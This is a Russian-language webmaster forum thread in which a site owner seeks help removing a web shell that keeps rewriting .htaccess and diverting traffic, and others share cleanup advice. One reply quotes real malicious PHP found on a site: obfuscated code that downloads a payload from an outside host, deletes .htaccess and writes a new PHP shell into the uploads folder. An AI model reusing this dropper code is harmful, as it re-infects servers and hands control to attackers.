Как вычислить шелл?

12
rewiaca
На сайте с 15.07.2009
Offline
93
1532

Залили шелл на пару сайтов, один - Livestreet, другой DLE, так же нагуглил у людей та же история но с Wordpress (обсуждение).

Суть в чем: каждый ~10 минут изменяется htaccess, ставяться права 444, и сливается трафик.

Пробовал: Давал владельца root htaccess, если через пользователя идут действия, но владелец меняется обратно на пользователя и в htaccess добавляются строки.

Как отловить какой скрипт изменяет htaccess?

Кто может помочь, пишите в личку

iCospi
На сайте с 27.09.2011
Offline
97
#1

rewiaca может обратитесь в саппорт хостинга, чтоб просканирвоали файлы ваших сайтов на вирусы.

Удобная проверка позиций (http://allpositions.ru/redirect/8497) | Быстрая покупка уник контента (http://advego.ru/62bgjaNHEc)
-S
На сайте с 10.12.2006
Offline
Модератор1355
#2
iCospi:
rewiaca может обратитесь в саппорт хостинга, чтоб просканирвоали файлы ваших сайтов на вирусы.

Шелл не спалится антивирусной проверкой.

ТС, как вариант - просмотрите файлы по дате изменения, найдите свежие.

А оптимально - переустановите движок, правильно расставив права и поставив владельца, чтобы нельзя было изменить файлы и права.

rewiaca
На сайте с 15.07.2009
Offline
93
#3

У меня подозрение что шелл не лежит на самом каталоге домена, но я проверю, надо запретить выполнение всех php скриптов в htaccess, и если он всеравно измениться то точно не в /www/


RemoveHandler php-script .php .php3 .php4 .php5 .php6 .phtml .phps .phpt .png .jpeg .jpg .gif
AddType application/x-httpd-php-source .php .php3 .php4 .php5 .php6 .phtml .phps .phpt .png .jpeg .jpg .gif

Только если там не такое расширение исполняемого скрипта?

Хостинг hostlife, говорят: "найдите вебместера квалифицированного"

Appassionato
На сайте с 22.06.2010
Offline
286
#4
Давал владельца root htaccess, если через пользователя идут действия, но владелец меняется обратно на пользователя и в htaccess добавляются строки.

Что-то мне подсказывает, что у Вас апач под рутом работает, или у хацкеров есть рут-доступ.

Хостинг Работает, как Часы ( http://tinyurl.com/nze85xw ). Проверено за 11+ лет.
C
На сайте с 20.09.2007
Offline
114
#5
ТС, как вариант - просмотрите файлы по дате изменения, найдите свежие.

Обычно дату меняют (если хостер не запретил или прав хватает - touch).

Очень часто ломают хостера. Поэтому в первую очередь вопросы хостеру.

А там - либо съезжайте, либо сами мониторте и заменяйте обратно. Но только зачем?

ИМХО, самые лучшие VDS: https://cp.inferno.name/aff.php?aff=4048
rewiaca
На сайте с 15.07.2009
Offline
93
#6
rewiaca:
У меня подозрение что шелл не лежит на самом каталоге домена, но я проверю, надо запретить выполнение всех php скриптов в htaccess, и если он всеравно измениться то точно не в /www/

RemoveHandler php-script .php .php3 .php4 .php5 .php6 .phtml .phps .phpt .png .jpeg .jpg .gif
AddType application/x-httpd-php-source .php .php3 .php4 .php5 .php6 .phtml .phps .phpt .png .jpeg .jpg .gif


Только если там не такое расширение исполняемого скрипта?

Хостинг hostlife, говорят: "найдите вебместера квалифицированного"

Не помогло, даже при:

RewriteEngine Off
php_flag engine 0
AddType "text/html" .php .php3

к htaccess добавляются строки редиректов. Значит ли это что шелл лежит в системных файлах? Можно ли отловить какой скрипт обращается к htaccess?

[Удален]
#7

У меня подобное было. В одном из файле было вот что

$f = file_get_contents('h'.'t'.'t'.'p'.':'.'//'.'s'.'c'.'a'.'r'.'y'.'f'.'i'.'l'.'m'.'.'.'ru'.'/get.'.'p'.'hp'.'?url='.$_SERVER['HTTP_HOST']).unlink(ROOT_DIR.'/'.'u'.'p'.'l'.'o'.'a'.'d'.'s'.'/.htaccess');


file_put_contents(ROOT_DIR.'/'.'u'.'p'.'l'.'o'.'a'.'d'.'s'.'/'.'f'.'ot'.'os'.'/pe'.'op'.'le'.'.p'.'hp', str_replace('fghfgh544ty', '?>', str_replace('fgfvsdffvsdvsd', '<?', $f)));

После выполнения удалялся автоматом .htaccess и снова заливался шелл🙅

rewiaca
На сайте с 15.07.2009
Offline
93
#8

Ох, с утра сижу, борюсь.

В общем оцените идею: переношу каждый сайт на отдельного пользователя в ISP, чищу htaccess и он больше не меняется. Процедура довольно геморная но что делать..

Думаю что так можно выявить сайт на котором стоит шел, меняющий htaccess на всех файлах, и удалить его.

rewiaca
На сайте с 15.07.2009
Offline
93
#9

Была уязвимость timthumb.php в Wordpress, через него был загружен hack.zip. Нашел сайт через который все было проделано, вычислил и все нормализовалось. Спасибо человеку, который откликнуля и написал в личку - Samvel, /ru/users/74883

R
На сайте с 24.01.2008
Offline
180
#10

Шеел в последнее время очень качественно вставляют в сами иполняемые файлы, в любом случае есть был шелл нуно искать на всех сайта вашего хоста!

Если нужна помощь стучите!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий